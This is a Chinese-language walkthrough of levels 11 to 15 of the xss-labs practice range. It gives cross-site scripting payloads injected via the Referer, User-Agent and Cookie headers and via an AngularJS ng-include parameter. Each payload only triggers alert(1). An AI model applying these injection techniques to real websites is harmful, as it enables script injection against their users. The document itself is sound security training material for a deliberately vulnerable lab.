第十一关（referer）

直接查看网页源代码，发现四个input被隐藏，不难看出，第四个名为t_ref的<input>标签是http头referer的参数（就是由啥地址转跳到这里的，http头的referer会记录有）

通过构造payload，配合burpsuite抓包可以得到

?keyword=&t_link" type='text'>//&t_history" type='text'>//&t_sort=" type='text'>//&t_ref=" type='text'>//

通过Burpsuite抓包，发现传参点依旧在t_sort并且发现没有referer的值，手动添加referer,payload是第十关的payload，成功绕过！

referer:&t_sort=" type='text' onclick=javascript:alert(1)>//

第十二关（uagent）

随便输入一个值，查看网页源代码，发现跟上一关差不多，只是t_ref变成了t_ua

还是像上一关一样，构造payload，配合burp抓包,再放包

?keyword=&t_link" type='text'>//&t_history" type='text'>//&t_sort=" type='text'>//&t_ua=" type='text'>//

本关通过User-Agent传值，于是修改User-Agent信息里添加onclick事件 即可绕过

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 "type="text" onclick=javascript:alert(1)//

十三关（cookie）

查看网页原代码，发现变成了t_cook，猜测在cookie中进行传参

通过配合burp抓包得到下图

构造payload，再放包即可

Cookie: user=" type='text' onclick=javascript:alert(1)//

第十四关

查看源代码，看了其他博主的，都说网站挂了，不能演示，具体知识点请看此位xss-labs靶场-第十四关 iframe和exif xss漏洞 - FreeBuf网络安全行业门户

第十五关（ng-include文件包涵）

查看网页源代码,发现了一个新东西ng-include,去查一下用法：ng-include指令用于包含外部的 HTML 文件。意思是可以打开外部的网页文件。ng-include详情请看他：AngularJS ng-include 指令 | 菜鸟教程 (runoob.com)

那就是说，如果输入第一关的路径，就可以跳转到第一关，输入第一关的过关信息即可成功，尝试一下，自己输入<script>alert(11)</script> 发现<>被转义了，但是用<img>标签可以成功绕过

构造payload

?src='level1.php?name=<img src=1 onerror=alert(1)>'